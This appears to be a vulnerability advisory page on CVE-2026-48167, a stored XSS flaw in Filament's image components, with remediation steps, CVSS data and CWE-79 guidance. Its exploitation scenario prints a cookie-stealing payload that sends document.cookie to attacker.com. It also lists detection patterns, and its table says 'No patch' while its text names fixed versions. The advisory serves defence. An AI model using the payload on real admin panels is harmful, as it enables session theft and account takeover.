CVE-2026-48167: filament stored XSS

Q: Is CVE-2026-48167 actively exploited?

No confirmed active exploitation of CVE-2026-48167 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-48167?

1. Patch: Upgrade Filament to 4.11.5 or 5.6.5 immediately. 2. Workaround (if patching is blocked): Add server-side HTML sanitization — e.g., strip_tags or HTMLPurifier in PHP — for all fields fed into ImageColumn/ImageEntry before database insertion. 3. Detection: Audit existing database records for planted payloads by searching image URL/path columns for patterns: '<script', 'javascript:', 'onerror=', 'onload=', 'data:text/html'. 4. Harden: Deploy a strict Content-Security-Policy (default-src 'self'; script-src 'self') to degrade XSS impact to near-zero even if the patch is delayed. 5. Review all other Filament column types rendering raw database values for similar unescaped output.

Q: What systems are affected by CVE-2026-48167?

This vulnerability affects the following AI/ML architecture patterns: ML ops dashboards, AI dataset management interfaces, model management admin panels, agent framework admin UIs.

Q: What is the CVSS score for CVE-2026-48167?

CVE-2026-48167 has a CVSS v3.1 base score of 6.4 (MEDIUM).

CISO Take

Filament's ImageColumn and ImageEntry components fail to HTML-escape database values before rendering, enabling stored XSS in any admin panel or data table built on Filament 4.0.0–4.11.4 or 5.x before 5.6.5. A low-privileged attacker who can write to the underlying database field — via API submission, data import, or form input — can plant malicious JavaScript that executes silently for every user who views the affected table or schema, including administrators. With CVSS Scope:Changed, a successful XSS escalates beyond the Filament component: stolen admin sessions can pivot to model registries, dataset management tooling, or CI/CD pipelines connected to the admin panel. Patch to Filament 4.11.5 or 5.6.5 immediately; if patching is blocked, enforce server-side sanitization on image URL/path fields before database insertion and deploy a strict Content-Security-Policy to cap the blast radius.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Medium severity (CVSS 6.4) with elevated practical risk where Filament underpins ML operations dashboards or AI dataset management interfaces. The Scope:Changed vector means a successful XSS escalates beyond the Filament component itself. Low privileges required for payload injection and no user interaction needed for storage makes the attack plausible for any account with write access to the underlying database field. No public exploit code or KEV listing indicates opportunistic rather than targeted exploitation at this time, but the low bar for execution is a concern in multi-tenant or externally-fed data pipelines.

How does the attack unfold?

Payload Injection

Attacker with low-privilege access submits a crafted HTML/JavaScript payload as an image URL or path value into a database field that feeds an ImageColumn or ImageEntry component.

AML.T0049

Stored XSS Trigger

An authenticated admin or user navigates to the Filament table or schema view; the browser renders the unsanitized database value and executes the injected script.

AML.T0011

Session Hijacking

The executed script exfiltrates the victim's session cookie or authentication token to an attacker-controlled endpoint, bypassing all application-level access controls.

AML.T0078

Privileged Takeover

Using the stolen admin session, the attacker accesses model management, API key issuance, or dataset controls within the AI/ML admin panel to exfiltrate artifacts or plant persistent backdoors.

AML.T0025

Payload Injection

Attacker with low-privilege access submits a crafted HTML/JavaScript payload as an image URL or path value into a database field that feeds an ImageColumn or ImageEntry component.

AML.T0049

Stored XSS Trigger

An authenticated admin or user navigates to the Filament table or schema view; the browser renders the unsanitized database value and executes the injected script.

AML.T0011

Session Hijacking

The executed script exfiltrates the victim's session cookie or authentication token to an attacker-controlled endpoint, bypassing all application-level access controls.

AML.T0078

Privileged Takeover

Using the stolen admin session, the attacker accesses model management, API key issuance, or dataset controls within the AI/ML admin panel to exfiltrate artifacts or plant persistent backdoors.

AML.T0025

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
filament	—	—	No patch

Do you use filament? You're affected.

How severe is it?

CVSS 3.1

6.4 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Changed

C Low

I Low

A None

What should I do?

5 steps

Patch: Upgrade Filament to 4.11.5 or 5.6.5 immediately.
Workaround (if patching is blocked): Add server-side HTML sanitization — e.g., strip_tags or HTMLPurifier in PHP — for all fields fed into ImageColumn/ImageEntry before database insertion.
Detection: Audit existing database records for planted payloads by searching image URL/path columns for patterns: '<script', 'javascript:', 'onerror=', 'onload=', 'data:text/html'.
Harden: Deploy a strict Content-Security-Policy (default-src 'self'; script-src 'self') to degrade XSS impact to near-zero even if the patch is delayed.
Review all other Filament column types rendering raw database values for similar unescaped output.

How is it classified?

Data Extraction Code Execution Auth Bypass Framework AML.T0011 - User Execution AML.T0049 - Exploit Public-Facing Application AML.T0078 - Drive-by Compromise

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001

A.9.2 - Security of AI system processing environments

NIST AI RMF

GOVERN 1.7 - Processes and procedures for AI risk management

OWASP LLM Top 10

LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-48167?

Filament's ImageColumn and ImageEntry components fail to HTML-escape database values before rendering, enabling stored XSS in any admin panel or data table built on Filament 4.0.0–4.11.4 or 5.x before 5.6.5. A low-privileged attacker who can write to the underlying database field — via API submission, data import, or form input — can plant malicious JavaScript that executes silently for every user who views the affected table or schema, including administrators. With CVSS Scope:Changed, a successful XSS escalates beyond the Filament component: stolen admin sessions can pivot to model registries, dataset management tooling, or CI/CD pipelines connected to the admin panel. Patch to Filament 4.11.5 or 5.6.5 immediately; if patching is blocked, enforce server-side sanitization on image URL/path fields before database insertion and deploy a strict Content-Security-Policy to cap the blast radius.

Is CVE-2026-48167 actively exploited?

No confirmed active exploitation of CVE-2026-48167 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-48167?

1. Patch: Upgrade Filament to 4.11.5 or 5.6.5 immediately. 2. Workaround (if patching is blocked): Add server-side HTML sanitization — e.g., strip_tags or HTMLPurifier in PHP — for all fields fed into ImageColumn/ImageEntry before database insertion. 3. Detection: Audit existing database records for planted payloads by searching image URL/path columns for patterns: '<script', 'javascript:', 'onerror=', 'onload=', 'data:text/html'. 4. Harden: Deploy a strict Content-Security-Policy (default-src 'self'; script-src 'self') to degrade XSS impact to near-zero even if the patch is delayed. 5. Review all other Filament column types rendering raw database values for similar unescaped output.

What systems are affected by CVE-2026-48167?

This vulnerability affects the following AI/ML architecture patterns: ML ops dashboards, AI dataset management interfaces, model management admin panels, agent framework admin UIs.

What is the CVSS score for CVE-2026-48167?

CVE-2026-48167 has a CVSS v3.1 base score of 6.4 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

ML ops dashboardsAI dataset management interfacesmodel management admin panelsagent framework admin UIs

MITRE ATLAS Techniques

AML.T0011 User Execution

AML.T0049 Exploit Public-Facing Application

AML.T0078 Drive-by Compromise

Compliance Controls Affected

ISO 42001: A.9.2

NIST AI RMF: GOVERN 1.7

OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

Filament is a collection of full-stack components for accelerated Laravel development. From 4.0.0 until 4.11.5 and 5.6.5, the ImageColumn and ImageEntry components render raw database values without escaping HTML. Where the data passed to these components isn't validated, an attacker could plant malicious HTML or JavaScript and achieve stored XSS that executes for users who view the table or schema. This vulnerability is fixed in 4.11.5 and 5.6.5.

Exploitation Scenario

An attacker with a low-privilege account — such as a data entry operator or an API client submitting image metadata to an AI dataset management pipeline — POSTs a crafted image URL such as `"><img src=x onerror=fetch('https://attacker.com/exfil?c='+btoa(document.cookie))>` into a database field rendered by an ImageColumn component. The payload is stored unescaped in the database. When an administrator next browses the affected Filament table view, the browser executes the script, exfiltrating the admin's session token. The attacker replays the stolen token to access model management, API key settings, or dataset upload features with full administrative privileges, potentially implanting backdoors or exfiltrating proprietary ML artifacts.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Primary CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.